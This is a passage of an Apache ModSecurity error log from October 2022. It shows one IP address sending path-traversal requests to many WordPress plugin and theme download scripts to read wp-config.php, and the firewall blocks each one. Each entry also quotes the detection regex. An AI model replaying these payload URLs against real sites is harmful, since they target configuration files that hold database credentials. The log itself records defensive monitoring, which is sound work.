185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-zip-attachments/download.php?File=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-zip-attachments/download.php"] [unique_id "Y0ZxXKBKlkjFPqrcdjM3tgAAABE"] [Wed Oct 12 02:48:46.574857 2022] [:error] [pid 22972:tid 140534572447488] [client 185.189.115.30:49974] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=file..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "Y0ZxXuLrJ0tgpRmNRAaHrAAAAMM"] [Wed Oct 12 02:48:46.726131 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:49976] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php"] [unique_id "Y0ZxXuLrJ0tgpRmNRAaHrQAAANE"] [Wed Oct 12 02:48:46.883717 2022] [:error] [pid 22972:tid 140534408505088] [client 185.189.115.30:49978] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source.php"] [unique_id "Y0ZxXuLrJ0tgpRmNRAaHrgAAAM4"] [Wed Oct 12 02:48:47.036718 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:49980] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/flash-album-gallery/facebook.php?i=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "Y0ZxX-LrJ0tgpRmNRAaHrwAAAME"] [Wed Oct 12 02:48:47.187412 2022] [:error] [pid 22338:tid 140534425290496] [client 185.189.115.30:49982] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/section-widget/themes/theme-loader.php?theme=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/section-widget/themes/theme-loader.php"] [unique_id "Y0ZxX2INFIoIk7hPzpaZLQAAAEw"] [Wed Oct 12 02:48:47.358573 2022] [:error] [pid 22338:tid 140534433683200] [client 185.189.115.30:49984] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/yourls-widget/yourls-widget-hook.php"] [unique_id "Y0ZxX2INFIoIk7hPzpaZLgAAAEs"] [Wed Oct 12 02:48:47.510675 2022] [:error] [pid 22338:tid 140534484039424] [client 185.189.115.30:49986] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "Y0ZxX2INFIoIk7hPzpaZLwAAAEU"] [Wed Oct 12 02:48:47.675980 2022] [:error] [pid 22337:tid 140534475646720] [client 185.189.115.30:49988] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/w3-total-cache/pub/files.php?file=..%2F..%2F..%2F..%2Fwp-config.php&nonce=0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/w3-total-cache/pub/files.php"] [unique_id "Y0ZxX6BKlkjFPqrcdjM3uAAAAAY"] [Wed Oct 12 02:48:49.381794 2022] [:error] [pid 22972:tid 140534425290496] [client 185.189.115.30:49994] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/count-per-day/download.php?n=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/count-per-day/download.php"] [unique_id "Y0ZxYeLrJ0tgpRmNRAaHsAAAAMw"] [Wed Oct 12 02:48:49.546117 2022] [:error] [pid 22972:tid 140534564054784] [client 185.189.115.30:49996] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php"] [unique_id "Y0ZxYeLrJ0tgpRmNRAaHsQAAAMQ"] [Wed Oct 12 02:48:49.697330 2022] [:error] [pid 22339:tid 140534408505088] [client 185.189.115.30:49998] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/backbone/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/backbone/download.php"] [unique_id "Y0ZxYdmZws0mEkXxGo-VTgAAAI4"] [Wed Oct 12 02:48:49.861003 2022] [:error] [pid 22339:tid 140534366541568] [client 185.189.115.30:50000] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cakifo/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cakifo/download.php"] [unique_id "Y0ZxYdmZws0mEkXxGo-VTwAAAJM"] [Wed Oct 12 02:48:50.014043 2022] [:error] [pid 22339:tid 140534341363456] [client 185.189.115.30:50002] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/derby-book-festival/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/derby-book-festival/download.php"] [unique_id "Y0ZxYtmZws0mEkXxGo-VUAAAAJY"] [Wed Oct 12 02:48:50.166016 2022] [:error] [pid 22339:tid 140534484039424] [client 185.189.115.30:50004] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/EEEZ/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/EEEZ/download.php"] [unique_id "Y0ZxYtmZws0mEkXxGo-VUQAAAIU"] [Wed Oct 12 02:48:50.317706 2022] [:error] [pid 22339:tid 140534374934272] [client 185.189.115.30:50006] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/greenearth-v1-06/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/greenearth-v1-06/download.php"] [unique_id "Y0ZxYtmZws0mEkXxGo-VUgAAAJI"] [Wed Oct 12 02:48:50.469027 2022] [:error] [pid 22339:tid 140534400112384] [client 185.189.115.30:50008] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IqraAcademy/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IqraAcademy/download/download.php"] [unique_id "Y0ZxYtmZws0mEkXxGo-VUwAAAI8"] [Wed Oct 12 02:48:50.620236 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:50010] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lmm5th/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lmm5th/download.php"] [unique_id "Y0ZxYtmZws0mEkXxGo-VVAAAAIg"] [Wed Oct 12 02:48:50.771049 2022] [:error] [pid 22339:tid 140534589232896] [client 185.189.115.30:50012] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/loom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/loom/download.php"] [unique_id "Y0ZxYtmZws0mEkXxGo-VVQAAAIE"] [Wed Oct 12 02:48:50.936176 2022] [:error] [pid 22972:tid 140534475646720] [client 185.189.115.30:50016] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mercato/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mercato/framework/utilities/download/getfile.php"] [unique_id "Y0ZxYuLrJ0tgpRmNRAaHsgAAAMY"] [Wed Oct 12 02:48:51.087190 2022] [:error] [pid 22339:tid 140534564054784] [client 185.189.115.30:50018] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "Y0ZxY9mZws0mEkXxGo-VVwAAAIQ"] [Wed Oct 12 02:48:51.238571 2022] [:error] [pid 22972:tid 140534442075904] [client 185.189.115.30:50020] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ParentingOurParents/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ParentingOurParents/download/download.php"] [unique_id "Y0ZxY-LrJ0tgpRmNRAaHswAAAMo"] [Wed Oct 12 02:48:51.402336 2022] [:error] [pid 22338:tid 140534589232896] [client 185.189.115.30:50022] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match 